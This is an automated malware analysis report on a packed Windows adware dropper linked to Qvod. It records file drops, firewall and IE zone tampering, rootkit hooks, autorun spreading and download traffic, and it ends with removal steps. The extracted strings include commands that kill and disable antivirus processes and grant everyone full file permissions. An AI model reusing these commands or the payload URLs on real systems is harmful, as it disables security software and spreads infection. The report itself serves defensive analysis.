MD5: 182cca26974b960089e80cbfbe087428
SHA1: 972470786084e7f28a02d95c7b8dc7d2fab152c7
SHA256: d4547c3420612d13e811e68823882c3d10056bc74bbf91abb4e971e01337bfe4
SSDeep: 3072:OwR5g46PJhr dXwfhsuHt7pULOpcnKtQpQaFB6AGqy4cqv l1ghILvpsyFco2PEx:/R2zP yfzBqacKMBgx/qv zghESrESs
Size: 225677 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-12-10 07:55:16
Analyzed on: WindowsXP SP3 32-bit

Summary:

Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.

Payload

Process activity

The Adware creates the following process(es):

taskkill.exe:616
taskkill.exe:828
taskkill.exe:1196
sc.exe:1016
rundll32.exe:1672
%original file name%.exe:1156
cacls.exe:1632
cacls.exe:260

The Adware injects its code into the following process(es):

6.exe:1524
QvodSetupPlus3.0.exe:580

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 6.exe:1524 makes changes in the file system.
The Adware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\QvodSetupPlus.exe.!qd (1691 bytes)
C:\ (4 bytes)
%System%\func.dll (18563831 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (8 bytes)
C:\autorun.inf (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (1186 bytes)
%System%\drivers\etc\hosts (5 bytes)
%WinDir% (1364 bytes)
C:\$Directory (212 bytes)
%System%\dllcache (4 bytes)
%WinDir%\inf (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%System%\config\systemprofile (4 bytes)
%System%\drivers\pcidump.sys (5404535 bytes)
%System%\config (100 bytes)
%System%\drivers (296 bytes)
%WinDir%\phpq.dll (22141559 bytes)
%Documents and Settings%\%current user% (4 bytes)
%System%\CatRoot2 (96 bytes)
C:\1.exe (31 bytes)
%System% (5960 bytes)

The process rundll32.exe:1672 makes changes in the file system.
The Adware creates and/or writes to the following file(s):

%System%\drivers\acpiec.sys (14 bytes)

The process %original file name%.exe:1156 makes changes in the file system.
The Adware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6.exe (438 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QvodSetupPlus3.0.exe (3497 bytes)

The Adware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)

The process QvodSetupPlus3.0.exe:580 makes changes in the file system.
The Adware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\qd.ini (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QvodSetupPlus.exe.!qd (627712 bytes)

Registry activity

The process taskkill.exe:616 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 0B 07 5E EF 13 77 70 5A 86 EC C5 0B 00 99 6E"

The process taskkill.exe:828 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 70 03 FF 2C B8 30 3F 67 35 D5 67 1C BF 19 01"

The process taskkill.exe:1196 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 4D D1 98 F9 BF C9 CF 21 C3 A4 32 2F 2A 8B 8C"

The process sc.exe:1016 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 F8 77 B3 8E 62 1B D1 3D C5 7C A8 69 38 98 7B"

The process rundll32.exe:1672 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 82 72 17 54 6A 39 8C 29 31 9A C2 6A 6F E6 EA"

The process %original file name%.exe:1156 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 77 3C A5 C7 07 F2 D0 03 4C 0D B0 3B B1 8B FA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"6.exe" = "Windows Calculator"
"QvodSetupPlus3.0.exe" = "QvodInstall Module"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process QvodSetupPlus3.0.exe:580 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 03 A9 9E A0 A8 BE 74 DC D8 F5 80 C5 62 6B 45"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp]
"QvodSetupPlus3.0.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\QvodSetupPlus3.0.exe:*:Enabled:QVOD"

The process cacls.exe:1632 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 9F 58 4F F0 6B 38 23 8A 21 81 9B B4 F5 89 72"

The process cacls.exe:260 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D FA 98 9A 97 FC 32 C4 FD BE 4B CF F1 B2 F0 3B"

Dropped PE files

HOSTS file anomalies

The Adware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 5743 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Adware installs the following kernel-mode hooks:

ZwQuerySystemInformation

Using the driver "%System%\drivers\pcidump.sys" the Adware substitutes IRP handlers in a file system driver (NTFS) to control operations with files:

MJ_CREATE

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Adware's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 27
655ebda89a8c316de7ce5873ff1deb61
f979ad42b1f8cf01c151d3d09a437fb6
b716149de896974bf5d514592e8c7209
268211e652c08efd0d26a3e0d668f571
b97504c04a2f6969dce449c432106672
011819f0d135f70db8601b8a6ff2677b
f045fd21b3c9462938fe27e5ee4f06a3
66e69190d8ef735a301516e348c35190
790ada328637bd837b55fbf63280816d
bfc04c03ea863ac32e915d9255c7d9b8
917a7bea1c81ec3b61eeef59c454ed84
3b962c5e68dc495b9dac718c305f1cce
5ac95b4cbac570ac3674c873669ca552
1fbd74b51c3a6f9f3cea8425d96177fc
963c483fda50e85a28f852983123eb15
e391435dfa53cd9dbfdb42fba8d059f1
5551794e263875a795c680479c97527f
4bf082ed0c0a5e6821c59f6873c506c8
6cfc96e51ddd7beb1294cb8d0836a751
4980695fdfef0015de369e969c0df056
ee881ac1ac662ffa662dd5b30fda6ab3
95759d0e94837f34197e14a949bc6525
dffa87da1c5f035a69fe01d7593329ef
61ce4dd0f1b7482b6cdbed621f45c762
e3425dd32acaa9f1830c97a82f44bc35

URLs

URL	IP
hxxp://b2.st.dns.kuaibo.com/qd.jpg
hxxp://b2.st.dns.kuaibo.com/QvodSetupPlus5_5.0.72_for_35.exe
hxxp://qd.qvod.com/QvodSetupPlus5_5.0.72_for_35.exe	175.6.0.104
hxxp://update.qvod.com/qd.jpg	175.6.0.106
agent.qvod.com	222.186.3.142
stun.qvod.com	60.55.32.90
track.qvod.com	222.186.3.147

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE QVOD Related Spyware/Malware User-Agent (Qvod)

Traffic

GET /QvodSetupPlus5_5.0.72_for_35.exe HTTP/1.1

Accept: */*

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)

Host: qd.qvod.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 18 Nov 2014 21:05:42 GMT

Content-Type: application/octet-stream

Content-Length: 28536664

Connection: keep-alive

Server: nginx

Last-Modified: Tue, 06 Sep 2011 10:48:50 GMT

ETag: "4e65fa92-1b36f58"

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\...........2.......p....@.........................
[email protected]........
...W...............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected]...@[email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>[email protected].>[email protected]
...Pr@..}..e..9}[email protected]........ M............U....M....3..
.3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M..
[email protected]@..u....E..9}[email protected].}.j
[email protected]@[email protected] ...Pj.h.6B.W..Xr@.
.u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.
;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>

GET /qd.jpg HTTP/1.1

Accept: application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: QvodDown

Host: update.qvod.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 18 Nov 2014 21:05:39 GMT

Content-Type: image/jpeg

Content-Length: 144

Connection: keep-alive

Server: nginx

Last-Modified: Tue, 06 Sep 2011 11:14:58 GMT

ETag: "4e6600b2-90"

Accept-Ranges: bytes
[QVODDOWN]..Name=QvodSetupPlus.exe..Hash=14109F1A7EDB0375DB868071287D1
9C0D1EDFA45..Httpurl=hXXp://qd.qvod.com/QvodSetupPlus5_5.0.72_for_35.e
xe....

The Adware connects to the servers at the folowing location(s):

`.rsrc

.tTPV

u.hH.C

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

user32.dll

portuguese-brazilian

GET /%s HTTP/1.1

Accept: application/vnd.ms-powerpoint, application/msword, */*

Host: %s

%s (%s)

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

%s %.2f GB

%s %.2f MB

%s %I64d KB

%s %I64d Byte

Httpurl

hXXp://update.qvod.com/qd.jpg

%s\qd.ini

%s\%s

%s_1.%s

QvodSetupPlus.exe

hXXp://

QVODd
2I64X

tcp connecting limit is %d

\drivers\tcpip.sys

stun01.sipphone.com

stun.qvod.com

61.139.219.200

track.qvod.com

TCP Port

61.139.219.203

221.194.134.216

agent.qvod.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)

Range: bytes=%u-

Port Restricted Nat

, random port

, preserves ports

PWindowsFirewallAppIsEnabled failed: 0xlx

M-SEARCH * HTTP/1.1

HOST: 239.255.255.250:1900

controlURL

URLBase

HTTP/1.1

s:encodingStyle="hXXp://schemas.xmlsoap.org/soap/encoding/">

xmlns:s="hXXp://schemas.xmlsoap.org/soap/envelope/"

AddPortMapping

NewPortMappingDescription

NewInternalPort

NewExternalPort

DeletePortMapping

External NAT port in use

External NAT port in use: Too many retries

Port mapping not owned by this class

Error getting StaticPortMappingCollection

problem parsing Password

Password =

ipv6 not supported

HMAC with password:

Encoding Password:

About to send msg of len

Some problem opening port/interface to send on

POST /service HTTP/1.1

Content-Length: %d

Host: %s:%d

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)

127.0.0.1

recv %d

Opened port

Port

for receiving UDP is in use

Could not bind UDP receive port

Could not create a UDP socket:

err EAFNOSUPPORT in send

zcÁ

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\QvodSetupPlus3.0.exe

GetCPInfo

.text

`.rdata

@.data

.rsrc

@.MNe|

version="5.1.0.0"

name="test.exe"/>

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

VERSION.dll

WS2_32.dll

.torrent

: %d K/S

%s ...

%s...

3, 0, 0, 0

QvodInstall.exe

QvodSetupPlus3.0.exe_580_rwx_00401000_0004A000:

.tTPV

u.hH.C

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

user32.dll

portuguese-brazilian

GET /%s HTTP/1.1

Accept: application/vnd.ms-powerpoint, application/msword, */*

Host: %s

%s (%s)

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

%s %.2f GB

%s %.2f MB

%s %I64d KB

%s %I64d Byte

Httpurl

hXXp://update.qvod.com/qd.jpg

%s\qd.ini

%s\%s

%s_1.%s

QvodSetupPlus.exe

hXXp://

QVODd
2I64X

tcp connecting limit is %d

\drivers\tcpip.sys

stun01.sipphone.com

stun.qvod.com

61.139.219.200

track.qvod.com

TCP Port

61.139.219.203

221.194.134.216

agent.qvod.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)

Range: bytes=%u-

Port Restricted Nat

, random port

, preserves ports

PWindowsFirewallAppIsEnabled failed: 0xlx

M-SEARCH * HTTP/1.1

HOST: 239.255.255.250:1900

controlURL

URLBase

HTTP/1.1

s:encodingStyle="hXXp://schemas.xmlsoap.org/soap/encoding/">

xmlns:s="hXXp://schemas.xmlsoap.org/soap/envelope/"

AddPortMapping

NewPortMappingDescription

NewInternalPort

NewExternalPort

DeletePortMapping

External NAT port in use

External NAT port in use: Too many retries

Port mapping not owned by this class

Error getting StaticPortMappingCollection

problem parsing Password

Password =

ipv6 not supported

HMAC with password:

Encoding Password:

About to send msg of len

Some problem opening port/interface to send on

POST /service HTTP/1.1

Content-Length: %d

Host: %s:%d

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)

127.0.0.1

recv %d

Opened port

Port

for receiving UDP is in use

Could not bind UDP receive port

Could not create a UDP socket:

err EAFNOSUPPORT in send

zcÁ

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\QvodSetupPlus3.0.exe

GetCPInfo

.text

`.rdata

@.data

.rsrc

.torrent

: %d K/S

%s ...

%s...

6.exe_1524:

.nsp0

.nsp1

.nsp2

GetWindowsDirectoryA

WinExec

\phpq.dll

rundll32.exe func.dll, droqp

\system32\func.dll

cmd /c taskkill /im ScanFrm.exe /f

cmd /c taskkill /im egui.exe /f

cmd /c taskkill /im ekrn.exe /f

cmd /c sc config ekrn start= disabled

cmd /c cacls "%s" /e /p everyone:f

cmd /c cacls %s /e /p everyone:f

\temp\explorer.exe

\drivers\gm.dls

Explorer.EXE

explorer.EXE

EXPLORER.EXE

EXPLORER.exe

Explorer.exe

explorer.exe

GetProcAddressLoadLibraryACloseHandleGetSystemTimeGetModuleHandleASleepGetTempPathACopyFileAGetWindowsDirectoryAGetSystemDirectoryAGetModuleFileNameACreateMutexAGlobalAddAtomAOpenMutexAGlobalFindAtomAstrcpymemsetsprintfstrcatstrstrstrlen

Ci=l_[n_Msg\ifc]Fche

,-2) ) ),

,-2) ) )-

,-2) ) ).

,-2) ) ) 

,-,),/), ,)13

,-2),),),

,-2) ),),

1,),-3),2,),,053 3 

,-,),,)4 )24

,-0)4 )33).3

- /),22)4-)13

-, )2/),/0)-.1

-, )21) ),..

-,4),-4)-.4)-- 

1,),11).-)-

-,4),0.)/ )--,

-,3)4-),31)-2

-,4),0.)/1)-2

-,4),0.)0-),-.

--,),40)/-)2,

---)2.)-,3),,0

- .),, ),13)-..53 

- .),, ),13)--,53 

.1.ss)^jh

04)./),.,)0/

-, )0,)/0)0

04)./),43)--3

04)./),43)33

04)./),43)42

1 ),4 ),,/), ,

1 ),4 )-,3)./

1 ),4,),-/)-0-

1,),/0),,2)-,-

1,),02), 4)---

20),-1).)-,1

20),-1).)-,2

20),-1).)-,3

04),-0)-.,),225,2222

20),-1).)-- 

20),-1).)--,

20),-1).)---

kjk.om\k)`s`

KERNEL32.DLL

MSVCRT.DLL

<85%C

/-*$^%?3

Windows Calculator application file

5.1.2600.0 (xpclient.010817-1148)

CALC.EXE

Microsoft(R) Windows(R) Operating System

5.1.2600.0

6.exe_1524_rwx_00404000_00017000:

GetWindowsDirectoryA

WinExec

\phpq.dll

rundll32.exe func.dll, droqp

\system32\func.dll

cmd /c taskkill /im ScanFrm.exe /f

cmd /c taskkill /im egui.exe /f

cmd /c taskkill /im ekrn.exe /f

cmd /c sc config ekrn start= disabled

cmd /c cacls "%s" /e /p everyone:f

cmd /c cacls %s /e /p everyone:f

\temp\explorer.exe

\drivers\gm.dls

Explorer.EXE

explorer.EXE

EXPLORER.EXE

EXPLORER.exe

Explorer.exe

explorer.exe

GetProcAddressLoadLibraryACloseHandleGetSystemTimeGetModuleHandleASleepGetTempPathACopyFileAGetWindowsDirectoryAGetSystemDirectoryAGetModuleFileNameACreateMutexAGlobalAddAtomAOpenMutexAGlobalFindAtomAstrcpymemsetsprintfstrcatstrstrstrlen

Ci=l_[n_Msg\ifc]Fche

,-2) ) ),

,-2) ) )-

,-2) ) ).

,-2) ) ) 

,-,),/), ,)13

,-2),),),

,-2) ),),

1,),-3),2,),,053 3 

,-,),,)4 )24

,-0)4 )33).3

- /),22)4-)13

-, )2/),/0)-.1

-, )21) ),..

-,4),-4)-.4)-- 

1,),11).-)-

-,4),0.)/ )--,

-,3)4-),31)-2

-,4),0.)/1)-2

-,4),0.)0-),-.

--,),40)/-)2,

---)2.)-,3),,0

- .),, ),13)-..53 

- .),, ),13)--,53 

.1.ss)^jh

04)./),.,)0/

-, )0,)/0)0

04)./),43)--3

04)./),43)33

04)./),43)42

1 ),4 ),,/), ,

1 ),4 )-,3)./

1 ),4,),-/)-0-

1,),/0),,2)-,-

1,),02), 4)---

20),-1).)-,1

20),-1).)-,2

20),-1).)-,3

04),-0)-.,),225,2222

20),-1).)-- 

20),-1).)--,

20),-1).)---

kjk.om\k)`s`

KERNEL32.DLL

MSVCRT.DLL

Windows Calculator application file

5.1.2600.0 (xpclient.010817-1148)

CALC.EXE

Microsoft(R) Windows(R) Operating System

5.1.2600.0

rundll32.exe_1672:

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

IMAGEHLP.dll

rundll32.pdb

.....eZXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

...eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

%Xnnnnnnnnnnnnnnn1

O3$dS7"%U9

.manifest

5.1.2600.5512 (xpsp.080413-2105)

RUNDLL.EXE

Windows

Operating System

5.1.2600.5512

YThere is not enough memory to run the file %s.

Please close other windows and try again.

9The file %s or one of its components could not be opened.

0The file %s or one of its components cannot run.

MThe file %s or one of its components requires a different version of Windows.

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

Error in %s

Missing entry:%s

Error loading %s

6.exe_1524_rwx_10000000_00001000:

.data

.rsrc

@.reloc

psapi.dll

\patch.exe

\dstdisk.exe

\defence.exe

192yuioealdjfiefjsdfas.txt

%SystemRoot%\System32\DRIVERS\puid.sys

\drivers\pcidump.sys

System32\DRIVERS\pcidump.sys

%SystemRoot%\system32\drivers\puid.sys

\\.\pcidump

\drivers\gm.dls

Windows

1.exe

autorun.inf

Open=1.exe

urlmon

\setup.exe

?mac=%s&ver=%s&key=%d&os=windows

.html

.hhqg

qq.exe

360safe.exe

\explorer.exe

\temp\explorer.exe

nfect_exe

6.exe_1524_rwx_10005000_00001000:

\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\6.exe

\??\%WinDir%\explorer.exe

ers\gm.dls

WinExec

CreatePipe

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

ADVAPI32.dll

InternetOpenUrlA

WININET.dll

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   taskkill.exe:616
   taskkill.exe:828
   taskkill.exe:1196
   sc.exe:1016
   rundll32.exe:1672
   %original file name%.exe:1156
   cacls.exe:1632
   cacls.exe:260

3. Delete the original Adware file.
   
4. Delete or disinfect the following files created/modified by the Adware:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\QvodSetupPlus.exe.!qd (1691 bytes)
   %System%\func.dll (18563831 bytes)
   C:\autorun.inf (21 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (1186 bytes)
   %System%\drivers\etc\hosts (5 bytes)
   C:\$Directory (212 bytes)
   %System%\dllcache (4 bytes)
   %WinDir%\inf (400 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %System%\config\systemprofile (4 bytes)
   %System%\drivers\pcidump.sys (5404535 bytes)
   %WinDir%\phpq.dll (22141559 bytes)
   %System%\CatRoot2 (96 bytes)
   C:\1.exe (31 bytes)
   %System%\drivers\acpiec.sys (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\6.exe (438 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\QvodSetupPlus3.0.exe (3497 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\qd.ini (144 bytes)
   

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
   
8. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.